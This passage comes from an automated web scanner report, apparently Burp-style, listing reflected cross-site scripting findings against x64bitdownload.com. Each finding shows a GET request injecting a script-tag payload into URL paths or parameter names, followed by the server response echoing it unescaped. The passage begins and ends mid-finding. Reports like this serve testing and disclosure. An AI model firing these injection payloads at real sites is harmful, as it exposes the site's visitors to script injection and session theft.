HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798" />
...[SNIP]...

4.1626. http://www.x64bitdownload.com/64-bit-yenc-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8dd"><script>alert(1)</script>dc3655acae7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1" />
...[SNIP]...

4.1627. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97190"><script>alert(1)</script>9747501482a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:34 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a" />
...[SNIP]...

4.1628. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/a-oz-insight-1768-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654dd"><script>alert(1)</script>8885636ee6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:40 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1" />
...[SNIP]...

4.1629. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2275c"><script>alert(1)</script>5b1950577da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html" />
...[SNIP]...

4.1630. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e79"><script>alert(1)</script>bc95b28f18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18" />
...[SNIP]...

4.1631. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0caf"><script>alert(1)</script>6aa48f4bf87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1" />
...[SNIP]...

4.1632. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa0d"><script>alert(1)</script>6f7a56462ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html" />
...[SNIP]...

4.1633. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc60f"><script>alert(1)</script>60697c60e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67" />
...[SNIP]...

4.1634. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d41a"><script>alert(1)</script>99f91a14c93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1" />
...[SNIP]...

4.1635. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f845d"><script>alert(1)</script>ffca716742e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html" />
...[SNIP]...

4.1636. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d3b"><script>alert(1)</script>93a1874d47f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f" />
...[SNIP]...

4.1637. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe46"><script>alert(1)</script>fbe8aea8d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1" />
...[SNIP]...

4.1638. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6340"><script>alert(1)</script>56e52f2f479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html" />
...[SNIP]...

4.1639. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36536"><script>alert(1)</script>62e91f4268d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d" />
...[SNIP]...

4.1640. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 695c3"><script>alert(1)</script>3a42e06dc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1" />
...[SNIP]...

4.1641. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4190"><script>alert(1)</script>b2c86d6f802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

